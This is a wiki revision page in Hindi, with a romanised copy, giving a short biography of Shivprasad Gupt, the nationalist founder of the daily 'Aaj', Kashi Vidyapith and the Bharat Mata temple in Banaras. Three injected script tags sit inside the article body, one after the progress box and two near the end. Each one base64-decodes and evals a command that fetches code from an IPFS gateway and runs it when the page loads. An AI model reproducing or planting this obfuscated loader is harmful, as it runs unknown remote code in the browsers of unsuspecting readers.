Difference between revisions of "शिवप्रसाद गुप्त"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Shivprasad-gupta.jpg|thumb|शिवप्रसाद गुप्त]]
 
[[चित्र:Shivprasad-gupta.jpg|thumb|शिवप्रसाद गुप्त]]
'''शिवप्रसाद गुप्त''' [[हिन्दी]] [[समाचार पत्र]] '[[दैनिक आज]]' के संस्थापक है।
+
'''शिवप्रसाद गुप्त''' (जन्म- [[28 जून]], [[1883]], [[बनारस]], [[उत्तर प्रदेश]]; मृत्यु- [[24 अप्रैल]], [[1944]]) [[हिन्दी]] के [[समाचार पत्र]] '[[दैनिक आज]]' के संस्थापक थे। देश की स्वतंत्रता के लिए संघर्ष करने वाले क्रांतिकारियों को इनका समर्थन प्राप्त था। अपनी राष्ट्रवादी गतिविधियों के लिए भी शिवप्रसाद गुप्त ने कई बार जेल की सजा काटी। ये '[[काशी विद्यापीठ]]' के संस्थापक थे। बनारस में 'भारत माता मन्दिर' का निर्माण भी इन्होंने करवाया था।
==जीवन परिचय==
+
==जन्म तथा शिक्षा==
* शिवप्रसाद [[बनारस]] के एक समृद्ध [[वैश्य]] [[परिवार]] में [[जून]], [[1883]] में पैदा हुए थे।
+
शिवप्रसाद गुप्त का जन्म [[बनारस]], [[उत्तर प्रदेश]] के एक समृद्ध [[वैश्य]] परिवार में 28 जून, 1883 को हुआ था। उन्होंने [[संस्कृत]], [[फ़ारसी भाषा|फ़ारसी]] और [[हिन्दी]] का अध्ययन घर पर ही किया था। उन्होंने [[इलाहाबाद]] से स्नात्तक की परीक्षा उत्तीर्ण की थी।
* उन्होंने [[संस्कृत]], पारसी और हिंदी का अध्ययन घर पर ही किया था। उन्होंने [[इलाहाबाद]] से स्नातक की परीक्षा उत्तीर्ण की।
+
====राष्ट्रवादी====
* शिवप्रसाद गुप्त पण्डित [[मदन मोहन मालवीय]], [[लाला लाजपत राय]], [[महात्मा गांधी]], [[आचार्य नरेन्द्र देव]] तथा [[डॉ. भगवान दास]] से अत्यन्त प्रभावित थे।  
+
[[पण्डित मदन मोहन मालवीय]], [[लाला लाजपत राय]], [[महात्मा गांधी]], [[आचार्य नरेन्द्र देव]] तथा [[डॉ. भगवान दास]] से शिवप्रसाद गुप्त अत्यन्त प्रभावित थे। क्रांतिकारियों को भी इनका सहयोग प्राप्त था। वे अपनी राष्ट्रवादी गतिविधियों के कारण अनेक बार जेल भी गये।
* शिवप्रसाद ने क्रांतिकारियों का सहयोग दिया था वे अपनी राष्ट्रवादी गतिविधियों के कारण अनेक बार जेल गये।
+
==महत्त्वपूर्ण कार्य==
* शिव प्रसाद ने 'आज' नाम से एक राष्ट्रवादी दैनिक पत्र निकाला।
+
गुप्तजी ने '[[आज दैनिक पत्र|आज]]' नाम से एक राष्ट्रवादी दैनिक पत्र निकाला था। '[[काशी विद्यापीठ]]' के संस्थापक भी शिवप्रसाद गुप्त थे। उन्होंने [[बनारस]] में 'भारत माता मन्दिर' का भी निर्माण करवाया था।
* वे [[काशी विद्यापीठ]] के संस्थापक थे।
 
* शिवप्रसाद गुप्त ने बनारस में भारत माता मन्दिर का भी निर्माण करवाया।
 
 
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{पत्रकार}}
 
{{पत्रकार}}
 
[[Category:पत्रकार]][[Category:स्वतन्त्रता सेनानी]][[Category:इतिहास कोश]][[Category:समाज कोश]][[Category:चरित कोश]]
 
[[Category:पत्रकार]][[Category:स्वतन्त्रता सेनानी]][[Category:इतिहास कोश]][[Category:समाज कोश]][[Category:चरित कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 12:59, 18 August 2013

thumb|shivaprasad gupt shivaprasad gupt (janm- 28 joon, 1883, banaras, uttar pradesh; mrityu- 24 aprail, 1944) hindi ke samachar patr 'dainik aj' ke sansthapak the. desh ki svatantrata ke lie sangharsh karane vale kraantikariyoan ko inaka samarthan prapt tha. apani rashtravadi gatividhiyoan ke lie bhi shivaprasad gupt ne kee bar jel ki saja kati. ye 'kashi vidyapith' ke sansthapak the. banaras mean 'bharat mata mandir' ka nirman bhi inhoanne karavaya tha.

janm tatha shiksha

shivaprasad gupt ka janm banaras, uttar pradesh ke ek samriddh vaishy parivar mean 28 joon, 1883 ko hua tha. unhoanne sanskrit, farasi aur hindi ka adhyayan ghar par hi kiya tha. unhoanne ilahabad se snattak ki pariksha uttirn ki thi.

rashtravadi

pandit madan mohan malaviy, lala lajapat ray, mahatma gaandhi, achary narendr dev tatha d aau. bhagavan das se shivaprasad gupt atyant prabhavit the. kraantikariyoan ko bhi inaka sahayog prapt tha. ve apani rashtravadi gatividhiyoan ke karan anek bar jel bhi gaye.

mahattvapoorn kary

guptaji ne 'aj' nam se ek rashtravadi dainik patr nikala tha. 'kashi vidyapith' ke sansthapak bhi shivaprasad gupt the. unhoanne banaras mean 'bharat mata mandir' ka bhi nirman karavaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>